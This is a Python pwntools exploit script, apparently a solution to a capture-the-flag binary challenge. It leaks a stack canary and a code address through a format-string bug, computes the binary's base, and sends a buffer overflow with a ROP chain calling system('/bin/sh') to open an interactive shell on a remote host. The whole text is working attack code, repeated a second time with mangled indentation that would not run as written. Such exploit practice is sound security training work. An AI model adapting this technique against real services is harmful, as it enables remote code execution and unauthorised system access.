0xPwny/exploit.py

## exploit.py

from pwn import *

_author_ = "ABDELJALIL NOUIRI"

r = remote("172.21.2.200",5555)

func_offset = 0x0000000000000B30
systemplt_offset = 0x000000000000960
binsh_offset = 0x0000000000001002
poprdi_offset = 0x0000000000000FD3

def leak_addr(offset):
	r.recvuntil("option :")
	r.sendline("1")
	r.recvuntil("!")
	r.sendline(offset)

	r.recv()
	r.sendline("2")

	r.recvline()

	leak = int(r.recvline().split(":")[1].strip(),16)
	return leak


def exploit(pld):
	r.recv()
	r.sendline("1")
	r.recvuntil("!")
	r.sendline(pld)
	r.interactive("shell $")

canary = leak_addr("%9$p")
func_addr = leak_addr("%8$p")

base_addr = func_addr - 0x0000000000000B30

poprdi = base_addr+0x0000000000000FD3
systemplt = base_addr+0x000000000000960
binsh = base_addr+0x0000000000001002

log.info("CANARY : "+hex(canary))
log.info("BASE   : "+hex(base_addr))

payload = "A"*520
payload += p64(canary)
payload += p64(0x1)
payload += p64(poprdi)
payload += p64(binsh)
payload += p64(systemplt)


exploit(payload)

	from pwn import *

	_author_ = "ABDELJALIL NOUIRI"

	r = remote("172.21.2.200",5555)

	func_offset = 0x0000000000000B30
	systemplt_offset = 0x000000000000960
	binsh_offset = 0x0000000000001002
	poprdi_offset = 0x0000000000000FD3

	def leak_addr(offset):
	r.recvuntil("option :")
	r.sendline("1")
	r.recvuntil("!")
	r.sendline(offset)

	r.recv()
	r.sendline("2")

	r.recvline()

	leak = int(r.recvline().split(":")[1].strip(),16)
	return leak


	def exploit(pld):
	r.recv()
	r.sendline("1")
	r.recvuntil("!")
	r.sendline(pld)
	r.interactive("shell $")

	canary = leak_addr("%9$p")
	func_addr = leak_addr("%8$p")

	base_addr = func_addr - 0x0000000000000B30

	poprdi = base_addr+0x0000000000000FD3
	systemplt = base_addr+0x000000000000960
	binsh = base_addr+0x0000000000001002

	log.info("CANARY : "+hex(canary))
	log.info("BASE : "+hex(base_addr))

	payload = "A"*520
	payload += p64(canary)
	payload += p64(0x1)
	payload += p64(poprdi)
	payload += p64(binsh)
	payload += p64(systemplt)


	exploit(payload)